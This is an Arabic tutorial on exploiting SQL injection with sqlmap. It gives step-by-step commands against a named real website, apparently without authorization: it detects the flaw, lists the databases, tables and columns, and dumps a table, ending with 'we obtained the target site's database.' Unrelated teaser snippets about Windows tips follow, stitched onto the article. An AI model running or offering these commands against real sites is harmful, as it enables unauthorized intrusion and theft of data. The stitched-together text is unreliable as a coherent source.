في هذا القسم، ستقدم لك LuckyTemplates بعض الأدوات المستخدمة لاستغلال SQL حقن .
يوجد حاليًا العديد من أدوات فحص الثغرات الأمنية (بما في ذلك حقن SQL). تسمح هذه الأدوات باكتشاف واستغلال الثغرات الأمنية في حقن SQL بقوة كبيرة. تتضمن بعض أدوات استغلال الثغرات الأمنية لحقن SQL التلقائية شائعة الاستخدام ما يلي:
هناك أيضًا بعض الأدوات الأخرى التي يمكنك الرجوع إليها مثل: Netsparker، jSQL حقن، Burp، BBQSQL...
فيما يلي عرض توضيحي لاستخدام Sqlmap لاستغلال حقن SQL الأساسي.
يمكنك تنزيل Sqlmap على http://sqlmap.org/
Sqlmap مكتوب بلغة Python، لذا لاستخدام هذه الأداة، عليك تثبيت Python. يمكنك تنزيل لغة بايثون من http://www.python.org/downloads/
أولاً يجب عليك تحديد موقع الويب المستهدف، وهنا لدي الهدف التالي: http://zerocoolhf.altervista.org/level1.php?id=1 (هذه الصفحة ميتة الآن).
الخطوة 1 : افتح cmd واكتب الأمر التالي:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”
سيكتشف sqlmap ثغرة الهدف ويوفر معلومات حول الثغرة الأمنية.
الخطوة 2 : بمجرد أن نحدد أن موقع الويب المستهدف به ثغرة أمنية في حقن SQL، ننتقل إلى العثور على اسم قاعدة البيانات.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs
=> قاعدة البيانات: my_zerocoolhf
الخطوة 3 : بعد تحديد اسم قاعدة البيانات، سنستمر في العثور على أسماء الجداول في قاعدة البيانات.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf
=> يوجد جدولان في قاعدة البيانات: المصادقة والكتاب
الخطوة الرابعة : تحديد أسماء الأعمدة في الجدول
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book
=> حدد الأعمدة في جدول الكتاب: المؤلف، المعرف، السعر، العنوان.
الخطوة 5 : تفريغ البيانات من الجدول.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book
=> إذن حصلنا على قاعدة بيانات الموقع المستهدف.
أعلاه عرض توضيحي أساسي لاستخدام sqlmap لاستغلال أخطاء حقن SQL. يمكنك معرفة المزيد حول خيارات sqlmap على https://github.com/sqlmapproject/sqlmap/wiki/Usage لدعم الاستغلال. استغلال حقن SQL.
هل ترى إشعار تفعيل Windows 10 في الزاوية اليمنى من الشاشة؟ سترشدك هذه المقالة إلى كيفية حذف إشعار طلب حقوق الطبع والنشر على نظام التشغيل Windows 10.
أصدرت Microsoft مؤخرًا آخر تحديث تراكمي لمستخدمي أجهزة الكمبيوتر التي تعمل بنظام Windows 10 والذي يسمى Build 14393.222. يعمل هذا التحديث الذي تم إصداره لنظام التشغيل Windows 10 بشكل أساسي على إصلاح الأخطاء بناءً على تعليقات المستخدمين وتحسين تجربة أداء نظام التشغيل.
هل لديك أجهزة كمبيوتر على شبكتك المحلية تحتاج إلى وصول خارجي؟ يمكن أن يكون استخدام مضيف أساسي كحارس بوابة لشبكتك حلاً جيدًا.
في بعض الأحيان قد تحتاج إلى حذف سجلات الأحداث القديمة مرة واحدة. في هذا الدليل، سيعرض لك موقع Quantrimang.com 3 طرق لحذف كافة سجلات الأحداث بسرعة في Windows 10 Event Viewer.
إذا كنت تفضل استخدام لوحة مفاتيح كلاسيكية قديمة، مثل IBM Model M، والتي لا تتضمن مفتاح Windows فعليًا، فهناك طريقة سهلة لإضافة المزيد، عن طريق استعارة مفتاح لا تستخدمه كثيرًا.
WindowTop هي أداة لديها القدرة على تعتيم جميع نوافذ التطبيقات والبرامج التي تعمل على أجهزة الكمبيوتر التي تعمل بنظام Windows 10. أو يمكنك استخدام واجهة ذات خلفية داكنة على النوافذ.
لقد ذكرنا في العديد من المقالات السابقة أن البقاء مجهول الهوية عبر الإنترنت أمر في غاية الأهمية. يتم تسريب المعلومات الخاصة كل عام، مما يجعل الأمان عبر الإنترنت ضروريًا بشكل متزايد. وهذا أيضًا هو السبب وراء ضرورة استخدام عناوين IP الافتراضية. فيما يلي، سنتعرف على طرق إنشاء عناوين IP وهمية!
شريط اللغة في نظام التشغيل Windows 8 عبارة عن شريط أدوات لغة مصغر مصمم للعرض تلقائيًا على شاشة سطح المكتب. ومع ذلك، يرغب العديد من الأشخاص في إخفاء شريط اللغة هذا على شريط المهام.
يعد تعظيم سرعة الإنترنت أمرًا ضروريًا لتحسين اتصال الشبكة لديك. يمكنك الحصول على تجربة ترفيه وعمل مثالية باستخدام أجهزة الكمبيوتر وأجهزة التلفزيون المجهزة للإنترنت ووحدات التحكم في الألعاب وما إلى ذلك.
يعد الاتصال اللاسلكي أمرًا ضروريًا اليوم، ولهذا السبب، يعد الأمان اللاسلكي ضروريًا لضمان السلامة في شبكتك الداخلية.
